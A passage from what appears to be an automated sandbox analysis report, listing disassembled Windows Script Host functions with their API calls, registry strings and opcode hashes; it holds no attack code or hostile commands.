                                                                                                                                                                                                                      • Opcode ID: b05bb633734924d824455dec1449fdc6cd566a3391014657b65a2296e9542db3
                                                                                                                                                                                                                      • Instruction ID: 73094c0f845097179e903446e5c630416d35afc1221300c0b6d15bea83d7095f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b05bb633734924d824455dec1449fdc6cd566a3391014657b65a2296e9542db3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11AF71601615BEEF216B769C0CE7B7EACFF45360F21452AB826D6190EA30CC14A7B0
                                                                                                                                                                                                                      Function 00595901 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8), ref: 00595933
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8,00020019), ref: 00595955
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,005921E8,00020019,00000000,0zX,?,?,?,0058AB73,80000002,0zX), ref: 00595961
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0059596B
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,005921E8,00020019,00000000,0zX,?,?), ref: 00595982
                                                                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,005921E8,00020019), ref: 0059599B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharCreateMultiWide$ErrorLast__alloca_probe_16
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                                                                                      • API String ID: 3071801306-2126348837
                                                                                                                                                                                                                      • Opcode ID: f2be72ce2ada317fb85209a16edb8afe0326bec3a6b024b8629a1496842b73f0
                                                                                                                                                                                                                      • Instruction ID: c7769f9b277efb5c150b28aa3bbe019e9730192d873e6b9cceed04bdd8d92f35
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2be72ce2ada317fb85209a16edb8afe0326bec3a6b024b8629a1496842b73f0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C117F31202535FAAF215B6B9C0CEEB3E6DFF5A7B0B11411AB519E1150EA318914E7F1
                                                                                                                                                                                                                      Function 0059405C Relevance: 12.1, APIs: 8, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$AllocFree$freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 945414394-0
                                                                                                                                                                                                                      • Opcode ID: 4afac99f4b762468add61c9e4f8bc924d3f79a3cfdc1cd6960cd57638879176f
                                                                                                                                                                                                                      • Instruction ID: 0704cf10f2f527d336ef7b36bd1ecba2d757d269110a120b8d6873cda2ba95de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4afac99f4b762468add61c9e4f8bc924d3f79a3cfdc1cd6960cd57638879176f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36112835100606ABDF319F29E808A4A7FA5FB04361F11892AF9568A660DB31DC66DE50
                                                                                                                                                                                                                      Function 0058D4A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058D6F1
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058D6FA
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058D703
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058D70C
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0058D715
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • WScript_OnScriptTerminate, xrefs: 0058D651
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeString
                                                                                                                                                                                                                      • String ID: WScript_OnScriptTerminate
                                                                                                                                                                                                                      • API String ID: 3341692771-526745235
                                                                                                                                                                                                                      • Opcode ID: 0b87bdad11571ff42f6a319eb88ae5ca1a5fe7de95a1c1d1cb6ac7278d3cd036
                                                                                                                                                                                                                      • Instruction ID: 6353cbafcd814876ac4a96fcd00c39a3549e25c6cf6530a6aa67308eea0ffba4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b87bdad11571ff42f6a319eb88ae5ca1a5fe7de95a1c1d1cb6ac7278d3cd036
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B818271A00209AFCF14EF98D895A6E7BF5FF48314F21046DE916A73A0DB70AD05CB60
                                                                                                                                                                                                                      Function 0058B1AA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B1C7
                                                                                                                                                                                                                      • SetErrorInfo.OLEAUT32(00000000,?,?,?,?,?,005873FB,00583A24), ref: 0058B31A
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32($:X), ref: 0058B36D
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000A2C), ref: 0058B376
                                                                                                                                                                                                                        • Part of subcall function 0058B654: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B68F
                                                                                                                                                                                                                        • Part of subcall function 0058B654: GetLastError.KERNEL32(?,00000A2C,00000000,0058B25F,?,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B69D
                                                                                                                                                                                                                        • Part of subcall function 0058B654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B774
                                                                                                                                                                                                                        • Part of subcall function 0058B654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B783
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$Error$InfoLocalString$CreateFormatLastMessage
                                                                                                                                                                                                                      • String ID: $:X$$:X
                                                                                                                                                                                                                      • API String ID: 878232057-1527886810
                                                                                                                                                                                                                      • Opcode ID: 9b9b55984f77867bf3fffdca18e1d01949d5a9cc1a85f31d860d15c1c6068441
                                                                                                                                                                                                                      • Instruction ID: cfbfc7729b064421b4f62baa7580bad20cbbe7fe985d00b36ee312ca4d5be26a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b9b55984f77867bf3fffdca18e1d01949d5a9cc1a85f31d860d15c1c6068441
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF518175B00215AFDB04EF99EC95A6D7BB9FF48314F250469EA02A7350CF31AD06DB81
                                                                                                                                                                                                                      Function 0058C992 Relevance: 10.6, APIs: 7, Instructions: 93COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0058C9B0
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0058C9BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DirectoryErrorLastSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3081803543-0
                                                                                                                                                                                                                      • Opcode ID: decf8540f2ceeaee3db93fe857554584c99b08d22e69e8fd9d0edf7b115657c6
                                                                                                                                                                                                                      • Instruction ID: 098d3da6f801d9ebb72d8e8bf6e85c3c9b83a8bfb5278c69c52c96f0b05ce4fc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: decf8540f2ceeaee3db93fe857554584c99b08d22e69e8fd9d0edf7b115657c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C21D87A60021AAFDB04AF6C9C4897E7FA9FF85310B11446FED46E7311DA31D8058B70
                                                                                                                                                                                                                      Function 00593124 Relevance: 10.6, APIs: 7, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 00593158
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005931A9
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005931B2
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005931BB
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 005931DE
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 005931ED
                                                                                                                                                                                                                      • free.MSVCRT ref: 005931F4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeString$ArrayDestroySafefree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1006837209-0
                                                                                                                                                                                                                      • Opcode ID: eecaf1c71e87ec1a3dbe900836618b410f6386549a9aefa9f1143b57c1ffe10d
                                                                                                                                                                                                                      • Instruction ID: 0b18ba9796e8cd175f4a3bfd864ff7f0551898bffa5de77af58d4a611e273142
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eecaf1c71e87ec1a3dbe900836618b410f6386549a9aefa9f1143b57c1ffe10d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE219A75200200EFCF259F18E988A2D7FB5FF48310F1644ADE9069B271CB319D42EB84
                                                                                                                                                                                                                      Function 0058A615 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00588028: _vsnprintf.MSVCRT ref: 0058805A
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?,Open2,?,?,?,Open2,00000000), ref: 0058A670
                                                                                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0058A689
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Open2,?,?,Open2,00000000), ref: 0058A6C1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseCreateOpen_vsnprintf
                                                                                                                                                                                                                      • String ID: Open2$SOFTWARE\Classes\%s\%s$Shell
                                                                                                                                                                                                                      • API String ID: 476925587-1376022265
                                                                                                                                                                                                                      • Opcode ID: fd691f5baff0cba4fc5a9ef26c0829216a20bc5df3bde76e9f77991237b34b4c
                                                                                                                                                                                                                      • Instruction ID: e61f317220f3d4972b985d5eb7d88b0dff18ef6d4d17303cfc282b1c738ea6f4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd691f5baff0cba4fc5a9ef26c0829216a20bc5df3bde76e9f77991237b34b4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5111EE75E0122467E730A7669C49EEB7BACFB44B50F050196BC45F3250E970DE849BA0
                                                                                                                                                                                                                      Function 005970E2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,?,?), ref: 0059711A
                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,?,00000006,00000000), ref: 00597137
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00597142
                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 0059715A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 00597110
                                                                                                                                                                                                                      • Locale, xrefs: 0059712F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue_wcsnicmp
                                                                                                                                                                                                                      • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                                                                                                                                                                                      • API String ID: 2262609651-1161606707
                                                                                                                                                                                                                      • Opcode ID: a5ef72889640bfac54b1655ad8e607073e82e7c2049f067c712be99f5685c442
                                                                                                                                                                                                                      • Instruction ID: 268518efd252c8700d577cb224361adaa9c8939bb6f63172ce66a1fc7e7618f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5ef72889640bfac54b1655ad8e607073e82e7c2049f067c712be99f5685c442
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C11A33591011AA7CF109FA6DC0CEBF7BBDFB99740F06001AED12E3160E6308909EB24
                                                                                                                                                                                                                      Function 005904E0 Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 005904FE
                                                                                                                                                                                                                      • _ftol2.MSVCRT ref: 00590548
                                                                                                                                                                                                                      • MsgWaitForMultipleObjectsEx.USER32(00000000,00000000,00000000,00001DFF,00000004), ref: 0059055D
                                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0059056D
                                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0059057C
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00590594
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CountMessageTick$DispatchMultipleObjectsPeekWait_ftol2
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281434459-0
                                                                                                                                                                                                                      • Opcode ID: da267f406896428177690809c640ead7b2032e0ba5155287a520f186fe6eaceb
                                                                                                                                                                                                                      • Instruction ID: 7d0080f54aac6a43617948e59b69e5a57892ec5bfb5a96b322edbf66c380c741
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da267f406896428177690809c640ead7b2032e0ba5155287a520f186fe6eaceb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D021CE71A04306ABDB11AF25DC0C79B3BB8FBC5750F125E19E995A11A4EB20C529DF81
                                                                                                                                                                                                                      Function 0059459D Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005945B6
                                                                                                                                                                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 00594606
                                                                                                                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 00594617
                                                                                                                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 00594622
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00594645
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059467B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Variant$ClearString$ArrayElementInitSafe
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 598207039-0
                                                                                                                                                                                                                      • Opcode ID: 287604bfa83cb77d0e74dfe1e079c4a7066a5329daf5041208ebae96e96d73d3
                                                                                                                                                                                                                      • Instruction ID: e6b54d8d1239656d1882fab53bce82989240457ca721e5bda44b5342e5ea2b91
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 287604bfa83cb77d0e74dfe1e079c4a7066a5329daf5041208ebae96e96d73d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30313C76204312ABCB14DF68D888C5BBBE9FB98350F05492EF995C7251DB30DD09DB51
                                                                                                                                                                                                                      Function 00596125 Relevance: 9.1, APIs: 6, Instructions: 83fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00589D3D,80000000,00000001,00000000,00000003,08000000,00000000,00000000,005810C4,00000000,000000FF,000000FF,?,00589D3D,00592FD0), ref: 0059615C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00589D3D,000000FF,00000000,00000000,00000000,00000000,00000000,005810C4,00000000,000000FF,000000FF,?,00589D3D,00592FD0), ref: 0059616E
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00589D3D,00592FD0,?,?,?,00000000,005810C4), ref: 0059617A
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0059618E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharCreateErrorFileLastMultiWide__alloca_probe_16
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2439737388-0
                                                                                                                                                                                                                      • Opcode ID: 8f0cf4948a8c16c4dec1e7842dee3263425a8cb00631a288600b0109b665cabe
                                                                                                                                                                                                                      • Instruction ID: 5d5e6ee4bf91fb9519a16bca918e2e2e8423a24861d1dd15861cecbd658e9050
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f0cf4948a8c16c4dec1e7842dee3263425a8cb00631a288600b0109b665cabe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721E730201225BBDF305B6A9C4DFAF7E6DFF463B4F20011AB519A51D1CA748908E6F0
                                                                                                                                                                                                                      Function 005925D4 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 313COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: -$/$cscript$wscript
                                                                                                                                                                                                                      • API String ID: 0-2169273652
                                                                                                                                                                                                                      • Opcode ID: 2929d16ac9586411308a0e87795bf22e97489cae0273facced9e7e1681d3c067
                                                                                                                                                                                                                      • Instruction ID: bf7ee597d5a89b3da4a2e75ee67e8a5f4c5af803633818f6935246d31c2cbe11
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2929d16ac9586411308a0e87795bf22e97489cae0273facced9e7e1681d3c067
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BB1D630A04385BAEF25CFB8C8087FEBFF5BF55314F24491AD881A6291D2619AC5D791
                                                                                                                                                                                                                      Function 00596DF5 Relevance: 9.1, APIs: 6, Instructions: 60filelibraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,005975C3,00000000), ref: 00596E10
                                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,005975C3,00000000), ref: 00596E24
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,005975C3,00000000), ref: 00596E2D
                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,005975C3,00000000), ref: 00596E3D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,005975C3,00000000), ref: 00596E46
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,005975C3,00000000), ref: 00596E67
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1262414356-0
                                                                                                                                                                                                                      • Opcode ID: 77cebc9aa3c3fa1cb030c7266d2cda7436e35d774b73db5b073cbe3040abc0b8
                                                                                                                                                                                                                      • Instruction ID: 552c91c67a348be931f834b8bf39a4609e7743e476dfcabdc8d3b1ac5129e63e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77cebc9aa3c3fa1cb030c7266d2cda7436e35d774b73db5b073cbe3040abc0b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A70126F66002187FFF201739AC8CF7B6A1CF799FE9F164529FA1192190D5628C18A170
                                                                                                                                                                                                                      Function 005929F8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy_s$FreeString
                                                                                                                                                                                                                      • String ID: 0zX$WSH
                                                                                                                                                                                                                      • API String ID: 4021863947-954669032
                                                                                                                                                                                                                      • Opcode ID: 566d15f9bfb39b699bac8223e32ccdd00326339a950bd1156281931eb32359f2
                                                                                                                                                                                                                      • Instruction ID: c200a2deb9aa6bdf8445d7fa061a150368d133c7331d109660f47178fd042fe3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 566d15f9bfb39b699bac8223e32ccdd00326339a950bd1156281931eb32359f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B512A75600205ABCF24AF28DC89ABD7BB6FF84304F15045EE41AD7391DE309D45CB95
                                                                                                                                                                                                                      Function 005946D5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00594765
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 005947A4
                                                                                                                                                                                                                      • SafeArrayPutElement.OLEAUT32(?,14Y0,,?), ref: 005947BC
                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005947C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
                                                                                                                                                                                                                      • String ID: 14Y0,
                                                                                                                                                                                                                      • API String ID: 90143694-2883143410
                                                                                                                                                                                                                      • Opcode ID: 9e1883860893939ed6cf8e336b3897dcbda4e7c4d9fffcd240ebdbb183cdba98
                                                                                                                                                                                                                      • Instruction ID: 4e485eca28b89367e516c4170967e889521782a4165fabfd7fe9525aaada4d3b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e1883860893939ed6cf8e336b3897dcbda4e7c4d9fffcd240ebdbb183cdba98
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0418D76A0161AABCF10DF98D885AAEBFB8FF49710F11452EE941A7240D7709D42CF90
                                                                                                                                                                                                                      Function 0058BC11 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 62registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,0058809D,00000000,00000000), ref: 0058BC93
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,0058809D,00000000), ref: 0058BCA2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                      • String ID: Enabled$Remote$Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                                                                                      • API String ID: 3535843008-3078226056
                                                                                                                                                                                                                      • Opcode ID: 5b9c5023dfc2852b4d1f8eab6711c8fc7d374a3398b521cd45b71072fb1889bd
